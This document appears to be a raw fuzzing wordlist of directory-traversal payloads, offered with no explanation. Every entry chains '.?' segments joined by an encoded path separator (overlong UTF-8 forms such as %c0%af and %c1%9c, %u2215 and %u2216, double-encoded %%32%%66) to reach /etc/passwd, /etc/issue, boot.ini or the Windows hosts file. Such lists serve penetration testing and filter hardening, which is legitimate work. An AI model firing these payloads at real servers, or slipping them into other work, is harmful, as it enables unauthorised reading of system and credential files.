-.?%c0%5c.?%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cpasswd -.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cissue -.?%c0%5c.?%c0%5c.?%c0%5cboot.ini -.?%c0%5c.?%c0%5c.?%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cpasswd -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cissue -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cboot.ini -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cpasswd -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cissue -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cboot.ini -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cpasswd -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cetc%c0%5cissue -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cboot.ini -.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5c.?%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.?%c1%9cetc%c1%9cpasswd -.?%c1%9cetc%c1%9cissue -.?%c1%9cboot.ini -.?%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.?%c1%9c.?%c1%9cetc%c1%9cpasswd -.?%c1%9c.?%c1%9cetc%c1%9cissue -.?%c1%9c.?%c1%9cboot.ini -.?%c1%9c.?%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cpasswd -.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cissue -.?%c1%9c.?%c1%9c.?%c1%9cboot.ini -.?%c1%9c.?%c1%9c.?%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cpasswd -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cissue -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cboot.ini -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cpasswd -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cissue -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cboot.ini -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cpasswd -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cetc%c1%9cissue -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cboot.ini -.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9c.?%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.?%c1%pcetc%c1%pcpasswd -.?%c1%pcetc%c1%pcissue -.?%c1%pcboot.ini -.?%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.?%c1%pc.?%c1%pcetc%c1%pcpasswd -.?%c1%pc.?%c1%pcetc%c1%pcissue -.?%c1%pc.?%c1%pcboot.ini -.?%c1%pc.?%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcpasswd -.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcissue -.?%c1%pc.?%c1%pc.?%c1%pcboot.ini -.?%c1%pc.?%c1%pc.?%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcpasswd -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcissue -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcboot.ini -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcpasswd -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcissue -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcboot.ini -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcpasswd -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcetc%c1%pcissue -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcboot.ini -.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pc.?%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.?%c0%9vetc%c0%9vpasswd -.?%c0%9vetc%c0%9vissue -.?%c0%9vboot.ini -.?%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.?%c0%9v.?%c0%9vetc%c0%9vpasswd -.?%c0%9v.?%c0%9vetc%c0%9vissue -.?%c0%9v.?%c0%9vboot.ini -.?%c0%9v.?%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vpasswd -.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vissue -.?%c0%9v.?%c0%9v.?%c0%9vboot.ini -.?%c0%9v.?%c0%9v.?%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vpasswd -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vissue -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vboot.ini -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vpasswd -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vissue -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vboot.ini -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vpasswd -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vetc%c0%9vissue -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vboot.ini -.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9v.?%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.?%c0%qfetc%c0%qfpasswd -.?%c0%qfetc%c0%qfissue -.?%c0%qfboot.ini -.?%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.?%c0%qf.?%c0%qfetc%c0%qfpasswd -.?%c0%qf.?%c0%qfetc%c0%qfissue -.?%c0%qf.?%c0%qfboot.ini -.?%c0%qf.?%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfpasswd -.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfissue -.?%c0%qf.?%c0%qf.?%c0%qfboot.ini -.?%c0%qf.?%c0%qf.?%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfpasswd -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfissue -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfboot.ini -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfpasswd -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfissue -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfboot.ini -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfpasswd -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfetc%c0%qfissue -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfboot.ini -.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qf.?%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.?%c1%8setc%c1%8spasswd -.?%c1%8setc%c1%8sissue -.?%c1%8sboot.ini -.?%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.?%c1%8s.?%c1%8setc%c1%8spasswd -.?%c1%8s.?%c1%8setc%c1%8sissue -.?%c1%8s.?%c1%8sboot.ini -.?%c1%8s.?%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8spasswd -.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8sissue -.?%c1%8s.?%c1%8s.?%c1%8sboot.ini -.?%c1%8s.?%c1%8s.?%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8spasswd -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8sissue -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8sboot.ini -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8spasswd -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8sissue -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8sboot.ini -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8spasswd -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8setc%c1%8sissue -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8sboot.ini -.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8s.?%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.?%c1%1cetc%c1%1cpasswd -.?%c1%1cetc%c1%1cissue -.?%c1%1cboot.ini -.?%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.?%c1%1c.?%c1%1cetc%c1%1cpasswd -.?%c1%1c.?%c1%1cetc%c1%1cissue -.?%c1%1c.?%c1%1cboot.ini -.?%c1%1c.?%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cpasswd -.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cissue -.?%c1%1c.?%c1%1c.?%c1%1cboot.ini -.?%c1%1c.?%c1%1c.?%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cpasswd -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cissue -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cboot.ini -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cpasswd -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cissue -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cboot.ini -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cpasswd -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cetc%c1%1cissue -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cboot.ini -.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1c.?%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.?%c1%afetc%c1%afpasswd -.?%c1%afetc%c1%afissue -.?%c1%afboot.ini -.?%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.?%c1%af.?%c1%afetc%c1%afpasswd -.?%c1%af.?%c1%afetc%c1%afissue -.?%c1%af.?%c1%afboot.ini -.?%c1%af.?%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.?%c1%af.?%c1%af.?%c1%afetc%c1%afpasswd -.?%c1%af.?%c1%af.?%c1%afetc%c1%afissue -.?%c1%af.?%c1%af.?%c1%afboot.ini -.?%c1%af.?%c1%af.?%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.?%c1%af.?%c1%af.?%c1%af.?%c1%afetc%c1%afpasswd -.?%c1%af.?%c1%af.?%c1%af.?%c1%afetc%c1%afissue -.?%c1%af.?%c1%af.?%c1%af.?%c1%afboot.ini -.?%c1%af.?%c1%af.?%c1%af.?%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afetc%c1%afpasswd -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afetc%c1%afissue -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afboot.ini -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afetc%c1%afpasswd -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afetc%c1%afissue -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afboot.ini -.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%af.?%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.?%bg%qfetc%bg%qfpasswd -.?%bg%qfetc%bg%qfissue -.?%bg%qfboot.ini -.?%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.?%bg%qf.?%bg%qfetc%bg%qfpasswd -.?%bg%qf.?%bg%qfetc%bg%qfissue -.?%bg%qf.?%bg%qfboot.ini -.?%bg%qf.?%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfpasswd -.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfissue -.?%bg%qf.?%bg%qf.?%bg%qfboot.ini -.?%bg%qf.?%bg%qf.?%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfpasswd -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfissue -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfboot.ini -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfpasswd -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfissue -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfboot.ini -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfpasswd -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfetc%bg%qfissue -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfboot.ini -.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qf.?%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.?%u2215etc%u2215passwd -.?%u2215etc%u2215issue -.?%u2215boot.ini -.?%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.?%u2215.?%u2215etc%u2215passwd -.?%u2215.?%u2215etc%u2215issue -.?%u2215.?%u2215boot.ini -.?%u2215.?%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.?%u2215.?%u2215.?%u2215etc%u2215passwd -.?%u2215.?%u2215.?%u2215etc%u2215issue -.?%u2215.?%u2215.?%u2215boot.ini -.?%u2215.?%u2215.?%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.?%u2215.?%u2215.?%u2215.?%u2215etc%u2215passwd -.?%u2215.?%u2215.?%u2215.?%u2215etc%u2215issue -.?%u2215.?%u2215.?%u2215.?%u2215boot.ini -.?%u2215.?%u2215.?%u2215.?%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215etc%u2215passwd -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215etc%u2215issue -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215boot.ini -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215etc%u2215passwd -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215etc%u2215issue -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215boot.ini -.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215.?%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.?%u2216etc%u2216passwd -.?%u2216etc%u2216issue -.?%u2216boot.ini -.?%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.?%u2216.?%u2216etc%u2216passwd -.?%u2216.?%u2216etc%u2216issue -.?%u2216.?%u2216boot.ini -.?%u2216.?%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.?%u2216.?%u2216.?%u2216etc%u2216passwd -.?%u2216.?%u2216.?%u2216etc%u2216issue -.?%u2216.?%u2216.?%u2216boot.ini -.?%u2216.?%u2216.?%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.?%u2216.?%u2216.?%u2216.?%u2216etc%u2216passwd -.?%u2216.?%u2216.?%u2216.?%u2216etc%u2216issue -.?%u2216.?%u2216.?%u2216.?%u2216boot.ini -.?%u2216.?%u2216.?%u2216.?%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216etc%u2216passwd -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216etc%u2216issue -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216boot.ini -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216etc%u2216passwd -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216etc%u2216issue -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216boot.ini -.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216.?%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -.?%uEFC8etc%uEFC8passwd -.?%uEFC8etc%uEFC8issue -.?%uEFC8boot.ini -.?%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.?%uEFC8.?%uEFC8etc%uEFC8passwd -.?%uEFC8.?%uEFC8etc%uEFC8issue -.?%uEFC8.?%uEFC8boot.ini -.?%uEFC8.?%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8passwd -.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8issue -.?%uEFC8.?%uEFC8.?%uEFC8boot.ini -.?%uEFC8.?%uEFC8.?%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8passwd -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8issue -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8boot.ini -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8passwd -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8issue -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8boot.ini -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8passwd -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8etc%uEFC8issue -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8boot.ini -.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8.?%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -.?%uF025etc%uF025passwd -.?%uF025etc%uF025issue -.?%uF025boot.ini -.?%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.?%uF025.?%uF025etc%uF025passwd -.?%uF025.?%uF025etc%uF025issue -.?%uF025.?%uF025boot.ini -.?%uF025.?%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.?%uF025.?%uF025.?%uF025etc%uF025passwd -.?%uF025.?%uF025.?%uF025etc%uF025issue -.?%uF025.?%uF025.?%uF025boot.ini -.?%uF025.?%uF025.?%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.?%uF025.?%uF025.?%uF025.?%uF025etc%uF025passwd -.?%uF025.?%uF025.?%uF025.?%uF025etc%uF025issue -.?%uF025.?%uF025.?%uF025.?%uF025boot.ini -.?%uF025.?%uF025.?%uF025.?%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025etc%uF025passwd -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025etc%uF025issue -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025boot.ini -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025etc%uF025passwd -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025etc%uF025issue -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025boot.ini -.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025.?%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -.?%%32%%66etc%%32%%66passwd -.?%%32%%66etc%%32%%66issue -.?%%32%%66boot.ini -.?%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.?%%32%%66.?%%32%%66etc%%32%%66passwd -.?%%32%%66.?%%32%%66etc%%32%%66issue -.?%%32%%66.?%%32%%66boot.ini -.?%%32%%66.?%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66passwd -.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66issue -.?%%32%%66.?%%32%%66.?%%32%%66boot.ini -.?%%32%%66.?%%32%%66.?%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66passwd -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66issue -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66boot.ini -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66passwd -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66issue -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66boot.ini -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66passwd -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66etc%%32%%66issue -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66boot.ini -.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66.?%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -.?%%35%%63etc%%35%%63passwd -.?%%35%%63etc%%35%%63issue -.?%%35%%63boot.ini -.?%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.?%%35%%63.?%%35%%63etc%%35%%63passwd -.?%%35%%63.?%%35%%63etc%%35%%63issue -.?%%35%%63.?%%35%%63boot.ini -.?%%35%%63.?%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63passwd -.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63issue -.?%%35%%63.?%%35%%63.?%%35%%63boot.ini -.?%%35%%63.?%%35%%63.?%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63passwd -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63issue -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63boot.ini -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63passwd -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63issue -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63boot.ini -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63.?%%35%%63etc%%35%%63passwd 